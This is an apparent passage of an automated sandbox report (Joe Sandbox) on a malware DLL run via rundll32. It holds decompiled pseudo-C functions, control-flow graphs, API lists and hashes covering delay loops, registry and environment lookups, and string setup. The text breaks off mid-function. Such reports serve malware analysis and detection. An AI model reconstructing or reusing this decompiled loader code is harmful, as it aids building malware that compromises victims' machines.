                                          • Opcode ID: 92272bdb6cafb47524a5c56f1c1f62246300cc2258039f11336e98f11c7631ab
                                          • Instruction ID: 2fe8c7c79380f6a3dbb8735b1d1d80d42c03ce82c8ff5c480cc2d4e3dd143529
                                          • Opcode Fuzzy Hash: 92272bdb6cafb47524a5c56f1c1f62246300cc2258039f11336e98f11c7631ab
                                          • Instruction Fuzzy Hash: CC212A79900219FFEB10DFE4DC44EEEBB79EB44304F0080A5E511A6291C7759E45EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 186 4c07c75-4c07c88 187 4c07c8f-4c07c93 StrChrA 186->187 188 4c07c95-4c07ca6 call 4c058be 187->188 189 4c07c8a-4c07c8e 187->189 192 4c07ca8-4c07cb4 StrTrimA 188->192 193 4c07ceb 188->193 189->187 195 4c07cb6-4c07cbf StrChrA 192->195 194 4c07ced-4c07cf4 193->194 196 4c07cd1-4c07cdd 195->196 197 4c07cc1-4c07ccb StrTrimA 195->197 196->195 198 4c07cdf-4c07ce9 196->198 197->196 198->194
                                          C-Code - Quality: 54%
                                          			E04C07C75(char* __eax) {
                                          				char* _t8;
                                          				intOrPtr _t12;
                                          				char* _t21;
                                          				signed int _t23;
                                          				char* _t24;
                                          				signed int _t26;
                                          				void* _t27;
                                          
                                          				_t21 = __eax;
                                          				_push(0x20);
                                          				_t23 = 1;
                                          				_push(__eax);
                                          				while(1) {
                                          					_t8 = StrChrA();
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_t23 = _t23 + 1;
                                          					_push(0x20);
                                          					_push( &(_t8[1]));
                                          				}
                                          				_t12 = E04C058BE(_t23 << 2);
                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                          				if(_t12 != 0) {
                                          					StrTrimA(_t21, 0x4c0c28c); // executed
                                          					_t26 = 0;
                                          					do {
                                          						_t24 = StrChrA(_t21, 0x20);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0;
                                          							_t24 =  &(_t24[1]);
                                          							StrTrimA(_t24, 0x4c0c28c);
                                          						}
                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                          						 *( *_t2 + _t26 * 4) = _t21;
                                          						_t26 = _t26 + 1;
                                          						_t21 = _t24;
                                          					} while (_t24 != 0);
                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,055895AC,?,?,?,04C04C85,055895AC,?,?,?,04C04A8B,?,?,?), ref: 04C07C8F
                                          • StrTrimA.KERNELBASE(?,04C0C28C,00000002,?,?,?,04C04C85,055895AC,?,?,?,04C04A8B,?,?,?,4D283A53), ref: 04C07CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04C04C85,055895AC,?,?,?,04C04A8B,?,?,?,4D283A53,?), ref: 04C07CB9
                                          • StrTrimA.SHLWAPI(00000001,04C0C28C,?,?,?,04C04C85,055895AC,?,?,?,04C04A8B,?,?,?,4D283A53,?), ref: 04C07CCB
                                          Strings
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 7d71f5f406dc8ef88d306869fdff7a455e343c6a8be948659f4ae7c77b559610
                                          • Instruction ID: c1a9e966b616556bfbc1ea3c1470732c4f58f3a06ff9d4a639d62ed38d5f94ec
                                          • Opcode Fuzzy Hash: 7d71f5f406dc8ef88d306869fdff7a455e343c6a8be948659f4ae7c77b559610
                                          • Instruction Fuzzy Hash: 1701D8757063256FD2259F658C48F3BBF9DEB45A60F128618F942C7280DB60FC0196F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 199 4c04908-4c04922 call 4c011af 202 4c04924-4c04932 199->202 203 4c04938-4c04946 199->203 202->203 205 4c04958-4c04973 call 4c01111 203->205 206 4c04948-4c0494b 203->206 212 4c04975-4c0497b 205->212 213 4c0497d 205->213 206->205 208 4c0494d-4c04952 206->208 208->205 209 4c04adb 208->209 211 4c04add-4c04ae2 209->211 214 4c04983-4c04998 call 4c01ec4 call 4c01a4e 212->214 213->214 219 4c049a3-4c049a9 214->219 220 4c0499a-4c0499d CloseHandle 214->220 221 4c049ab-4c049b0 219->221 222 4c049cf-4c049e7 call 4c058be 219->222 220->219 224 4c04ac6-4c04acb 221->224 225 4c049b6 221->225 230 4c04a13-4c04a15 222->230 231 4c049e9-4c04a11 memset RtlInitializeCriticalSection 222->231 227 4c04ad3-4c04ad9 224->227 228 4c04acd-4c04ad1 224->228 229 4c049b9-4c049c8 call 4c07827 225->229 227->211 228->211 228->227 236 4c049ca 229->236 235 4c04a16-4c04a1a 230->235 231->235 235->224 237 4c04a20-4c04a36 RtlAllocateHeap 235->237 236->224 238 4c04a66-4c04a68 237->238 239 4c04a38-4c04a64 wsprintfA 237->239 240 4c04a69-4c04a6d 238->240 239->240 240->224 241 4c04a6f-4c04a8f call 4c093d5 call 4c098f7 240->241 241->224 246 4c04a91-4c04a98 call 4c0205b 241->246 249 4c04a9a-4c04a9d 246->249 250 4c04a9f-4c04aa6 246->250 249->224 251 4c04aa8-4c04aaa 250->251 252 4c04abb-4c04abf call 4c09b6f 250->252 251->224 253 4c04aac-4c04ab0 call 4c06cd3 251->253 256 4c04ac4 252->256 257 4c04ab5-4c04ab9 253->257 256->224 257->224 257->252
                                          C-Code - Quality: 57%
                                          			E04C04908(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				CHAR* _t46;
                                          				void* _t49;
                                          				void* _t51;
                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E04C011AF();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0x4c0d25c; // 0x4000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0x4c0d25c = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0x4c0d164(0, 2);
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E04C01111( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0x4c0d2a4; // 0x97a5a8
                                          					if( *0x4c0d25c > 5) {
                                          						_t8 = _t26 + 0x4c0e5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0x4c0ea05; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E04C01EC4(_t27, _t27);
                                          					_t31 = E04C01A4E(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0x4c0d270 =  *0x4c0d270 ^ 0x81bbe65d;
                                          						_t32 = E04C058BE(0x60);
                                          						 *0x4c0d324 = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0x4c0d324; // 0x55895b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0x4c0d324; // 0x55895b0
                                          							 *_t51 = 0x4c0e845;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0x4c0d238, 0, 0x43);
                                          							 *0x4c0d2c4 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0x4c0d25c; // 0x4000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0x4c0d2a4; // 0x97a5a8
                                          								_t13 = _t58 + 0x4c0e55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4c0c28f);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E04C093D5( ~_v8 &  *0x4c0d270, 0x4c0d00c); // executed
                                          								_t42 = E04C098F7(0, _t55, _t63, 0x4c0d00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E04C0205B(_t55); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E04C09B6F(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t46 = E04C06CD3(__eflags,  &(_t67[4])); // executed
                                          									_t54 = _t46;
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0x4c0d160();
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E04C07827(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}


                                          APIs
                                            • Part of subcall function 04C011AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04C04920,00000001), ref: 04C011BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04C0499D
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • memset.NTDLL ref: 04C049ED
                                          • RtlInitializeCriticalSection.NTDLL(05589570), ref: 04C049FE
                                            • Part of subcall function 04C06CD3: memset.NTDLL ref: 04C06CED
                                            • Part of subcall function 04C06CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04C06D24
                                            • Part of subcall function 04C06CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04C04AB5), ref: 04C06D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04C04A29
                                          • wsprintfA.USER32 ref: 04C04A59
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: c4c3a024650caea430f97dd23cc32e03e1717d5aa434593f8543f5413598816a
                                          • Instruction ID: 5fb0d1ed57e8e8c3b31d363d7a62efd8ded13efa27b6fb0f9b8c86d3ac796846
                                          • Opcode Fuzzy Hash: c4c3a024650caea430f97dd23cc32e03e1717d5aa434593f8543f5413598816a
                                          • Instruction Fuzzy Hash: 9251B475A00215AFEB29EBE4D844B6F77AEEB04B04F058535E702D71C0E678FE409B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04C06CD3(void* __eflags, WCHAR* _a4) {
                                          				char _v40;
                                          				char _v44;
                                          				void _v48;
                                          				int _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				char _v68;
                                          				intOrPtr _v72;
                                          				int _v76;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				int _t45;
                                          				char _t50;
                                          				intOrPtr _t52;
                                          				void* _t55;
                                          				intOrPtr _t67;
                                          				void* _t70;
                                          				void* _t81;
                                          				WCHAR* _t90;
                                          
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_v76 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t40 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t5 = _t40 + 0x4c0ee24; // 0x410025
                                          				_t90 = E04C04814(_t5);
                                          				_v84 = _t90;
                                          				if(_t90 == 0) {
                                          					_t81 = 8;
                                          					L24:
                                          					return _t81;
                                          				}
                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                          				if(_t45 != 0) {
                                          					_t81 = 1;
                                          					L22:
                                          					E04C0147E(_v88);
                                          					goto L24;
                                          				}
                                          				if(E04C09138(0,  &_v96) != 0) {
                                          					_v96 = 0;
                                          				}
                                          				_t50 = E04C0A5E9(0,  *0x4c0d33c);
                                          				_v96 = _t50;
                                          				if(_t50 == 0) {
                                          					_t81 = 8;
                                          					goto L19;
                                          				} else {
                                          					_t52 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t11 = _t52 + 0x4c0e81a; // 0x65696c43
                                          					_t55 = E04C0A5E9(0, _t11);
                                          					_t93 = _t55;
                                          					if(_t55 == 0) {
                                          						_t81 = 8;
                                          					} else {
                                          						_t81 = E04C074B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                          						E04C0147E(_t93);
                                          					}
                                          					if(_t81 != 0) {
                                          						L17:
                                          						E04C0147E(_v92);
                                          						L19:
                                          						_t92 = _v96;
                                          						if(_v96 != 0) {
                                          							E04C0568A(_t92);
                                          						}
                                          						goto L22;
                                          					} else {
                                          						if(( *0x4c0d260 & 0x00000001) == 0) {
                                          							L14:
                                          							E04C06E92(_t81, _v60, _v56,  *0x4c0d270, 0);
                                          							_t81 = E04C06737(_v72,  &_v64,  &_v60, 0);
                                          							if(_t81 == 0) {
                                          								_v68 = _v96;
                                          								_v64 =  &_v60;
                                          								_t81 = E04C072F2( &_v84, 0);
                                          							}
                                          							E04C0147E(_v60);
                                          							goto L17;
                                          						}
                                          						_t67 =  *0x4c0d2a4; // 0x97a5a8
                                          						_t18 = _t67 + 0x4c0e823; // 0x65696c43
                                          						_t70 = E04C0A5E9(0, _t18);
                                          						_t95 = _t70;
                                          						if(_t70 == 0) {
                                          							_t81 = 8;
                                          						} else {
                                          							_t22 =  &_v96; // 0x65696c43
                                          							_t81 = E04C074B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                          							E04C0147E(_t95);
                                          						}
                                          						if(_t81 != 0) {
                                          							goto L17;
                                          						} else {
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          			}


                                          APIs
                                          • memset.NTDLL ref: 04C06CED
                                            • Part of subcall function 04C04814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04C06D15,00410025,00000005,?,00000000), ref: 04C04825
                                            • Part of subcall function 04C04814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04C04842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04C06D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04C04AB5), ref: 04C06D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 4e2c1bbc83c830b3dde2cfef79160f60ac6e40a9308d31dea4c8bcb8d52e185f
                                          • Instruction ID: 7f09d1925678d8e6864b52e94a54f9cf8e6b525eee26716eaf60e6d1c6554613
                                          • Opcode Fuzzy Hash: 4e2c1bbc83c830b3dde2cfef79160f60ac6e40a9308d31dea4c8bcb8d52e185f
                                          • Instruction Fuzzy Hash: 5F41B372204315AFE710EFA4DC80D6FB7EEEF44708F04892ABA95D7190D671EE149B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 314 4c04ffa-4c0503c 316 4c05042-4c0504b 314->316 317 4c050c3-4c050c9 314->317 318 4c0508c-4c0508f 316->318 319 4c0504d-4c0505e SysAllocString 316->319 322 4c05091-4c050a1 SysAllocString 318->322 323 4c050ed 318->323 320 4c05060-4c05067 319->320 321 4c05069-4c05081 319->321 325 4c050b5-4c050b8 320->325 331 4c05085-4c0508a 321->331 326 4c050a3 322->326 327 4c050cc-4c050eb 322->327 324 4c050ef-4c050f2 323->324 329 4c050f4-4c05101 324->329 330 4c050aa-4c050ac 324->330 325->317 328 4c050ba-4c050bd SysFreeString 325->328 326->330 327->324 328->317 329->317 330->325 333 4c050ae-4c050af SysFreeString 330->333 331->318 331->325 333->325
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04C05057
                                          • SysAllocString.OLEAUT32(04C0A6F4), ref: 04C0509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C050AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C050BD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 955d462eaed6f4d290d6ff4ee463462591ddb756fe639a093ea9088a61dbbf37
                                          • Instruction ID: 834ac53e1faff6d52b67b3a4c9aadee2c9c448aefc0fc02555e73b39e7d835e7
                                          • Opcode Fuzzy Hash: 955d462eaed6f4d290d6ff4ee463462591ddb756fe639a093ea9088a61dbbf37
                                          • Instruction Fuzzy Hash: 96311F76900209FFDB04DF98D8C49AE7BB9FF48304B11846EF90697250E775AA81CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 334 4c090a1-4c090b7 HeapCreate 335 4c090b9-4c090bc 334->335 336 4c090be-4c090d4 GetTickCount call 4c06a7f 334->336 337 4c0911c 335->337 336->337 340 4c090d6-4c090d7 336->340 341 4c090d8-4c09100 SwitchToThread call 4c01c04 Sleep 340->341 344 4c09102-4c0910b call 4c09511 341->344 347 4c09117 call 4c04908 344->347 348 4c0910d 344->348 347->337 348->347
                                          C-Code - Quality: 100%
                                          			E04C090A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t10;
                                          				void* _t13;
                                          				void* _t14;
                                          				void* _t15;
                                          				signed int _t16;
                                          				signed int _t22;
                                          
                                          				_t16 = __edx;
                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0x4c0d238 = _t5;
                                          				if(_t5 == 0) {
                                          					_t14 = 8;
                                          					return _t14;
                                          				}
                                          				 *0x4c0d1a8 = GetTickCount();
                                          				_t7 = E04C06A7F(_a4);
                                          				if(_t7 == 0) {
                                          					do {
                                          						_t22 = SwitchToThread() + 8;
                                          						_t10 = E04C01C04(_a4, _t22);
                                          						Sleep(0x20 + _t22 * 4); // executed
                                          					} while (_t10 == 1);
                                          					if(E04C09511(_t15) != 0) {
                                          						 *0x4c0d260 = 1; // executed
                                          					}
                                          					_t13 = E04C04908(_t16); // executed
                                          					return _t13;
                                          				}
                                          				return _t7;
                                          			}


                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04C06F11,?), ref: 04C090AA
                                          • GetTickCount.KERNEL32 ref: 04C090BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 04C090D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 04C090F7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: e3cd0c65597875323aaa2fab4e328191d6e541ab693c1a0a9c48d1f660043512
                                          • Instruction ID: ded1a9bb436cb5b426125515fbdba63c8f2b8977a11529cc07c21f46a5b0997a
                                          • Opcode Fuzzy Hash: e3cd0c65597875323aaa2fab4e328191d6e541ab693c1a0a9c48d1f660043512
                                          • Instruction Fuzzy Hash: E1F0C2B9644200AAE7107BB49C48B5A3AAAEB4475DF028121EA05D21C1EB38ED80DA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 4c068cf-4c068e9 call 4c09138 353 4c068eb 350->353 354 4c068ee-4c06907 call 4c01b13 350->354 353->354 356 4c0690c-4c06910 354->356 357 4c06916-4c06930 StrToIntExW 356->357 358 4c069cf-4c069d4 356->358 361 4c06936-4c06952 call 4c05fcb 357->361 362 4c069bf-4c069c1 357->362 359 4c069d6 call 4c0568a 358->359 360 4c069db-4c069e1 358->360 359->360 363 4c069c2-4c069cd HeapFree 361->363 367 4c06954-4c0696d call 4c075e7 361->367 362->363 363->358 370 4c0698f-4c069bd call 4c01bc1 HeapFree 367->370 371 4c0696f-4c06976 367->371 370->363 371->370 372 4c06978-4c0698a call 4c075e7 371->372 372->370
                                          C-Code - Quality: 100%
                                          			E04C068CF() {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t51;
                                          
                                          				_v12 = 0;
                                          				_t23 = E04C09138(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t4 = _t24 + 0x4c0ede0; // 0x5589388
                                          				_t5 = _t24 + 0x4c0ed88; // 0x4f0053
                                          				_t26 = E04C01B13( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0x4c0d2a4; // 0x97a5a8
                                          						_t11 = _t32 + 0x4c0edd4; // 0x558937c
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0x4c0ed88; // 0x4f0053
                                          						_t51 = E04C05FCB(_t11, _t12, _t11);
                                          						_t58 = _t51;
                                          						if(_t51 != 0) {
                                          							_t35 =  *0x4c0d2a4; // 0x97a5a8
                                          							_t13 = _t35 + 0x4c0ea59; // 0x30314549
                                          							if(E04C075E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                          								_t60 =  *0x4c0d25c - 6;
                                          								if( *0x4c0d25c <= 6) {
                                          									_t42 =  *0x4c0d2a4; // 0x97a5a8
                                          									_t15 = _t42 + 0x4c0ec3a; // 0x52384549
                                          									E04C075E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0x4c0d2a4; // 0x97a5a8
                                          							_t17 = _t38 + 0x4c0ee18; // 0x55893c0
                                          							_t18 = _t38 + 0x4c0edf0; // 0x680043
                                          							_t45 = E04C01BC1(_v8, 0x80000001, _t51, _t18, _t17);
                                          							HeapFree( *0x4c0d238, 0, _t51);
                                          						}
                                          					}
                                          					HeapFree( *0x4c0d238, 0, _v16);
                                          				}
                                          				_t53 = _v8;
                                          				if(_v8 != 0) {
                                          					E04C0568A(_t53);
                                          				}
                                          				return _t45;
                                          			}


















                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05589388,00000000,?,7519F710,00000000,7519F730), ref: 04C0691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,055893C0,?,00000000,30314549,00000014,004F0053,0558937C), ref: 04C069BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04C09C10), ref: 04C069CD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 2e85f07c4962cc9fb805fdfb18ca34cbec5f944ab7ab96bda95769b4aea117f1
                                          • Instruction ID: 1cfed681188aae38b3af1abf98d20d51f31d2dda8d24cc44234852aa96b6a2e8
                                          • Opcode Fuzzy Hash: 2e85f07c4962cc9fb805fdfb18ca34cbec5f944ab7ab96bda95769b4aea117f1
                                          • Instruction Fuzzy Hash: 9831B336A00108BFEB10EFD4DD84EAA7BBEEF04714F0680A5B605AB190D770EE54EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 376 4c09f11-4c09f39 377 4c09f59-4c09f61 RtlAllocateHeap 376->377 378 4c09f3b-4c09f43 RtlAllocateHeap 376->378 379 4c09f63-4c09f70 call 4c0514f 377->379 380 4c09f79-4c09f7b 377->380 378->380 381 4c09f45-4c09f52 call 4c01754 378->381 386 4c09f75-4c09f77 379->386 384 4c09f7c-4c09f7e 380->384 385 4c09f57 381->385 387 4c09f80-4c09fa1 call 4c07cf7 call 4c060cf 384->387 388 4c09fbc 384->388 385->386 386->384 394 4c09fa3-4c09fb6 call 4c06106 HeapFree 387->394 395 4c09fcb-4c09fdc 387->395 389 4c09fc2-4c09fc8 388->389 394->388 395->389 396 4c09fde-4c09fe5 395->396 396->389
                                          C-Code - Quality: 58%
                                          			E04C09F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				void* _v8;
                                          				void* __edi;
                                          				intOrPtr _t19;
                                          				void* _t25;
                                          				void* _t31;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr _t43;
                                          				void* _t44;
                                          
                                          				_t37 = __edx;
                                          				_t33 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t43 =  *0x4c0d2a4; // 0x97a5a8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0x4c0d238);
                                          				_t1 = _t43 + 0x4c0e791; // 0x6976612e
                                          				_t44 = _t1;
                                          				if( *0x4c0d24c >= 5) {
                                          					if(RtlAllocateHeap() == 0) {
                                          						L6:
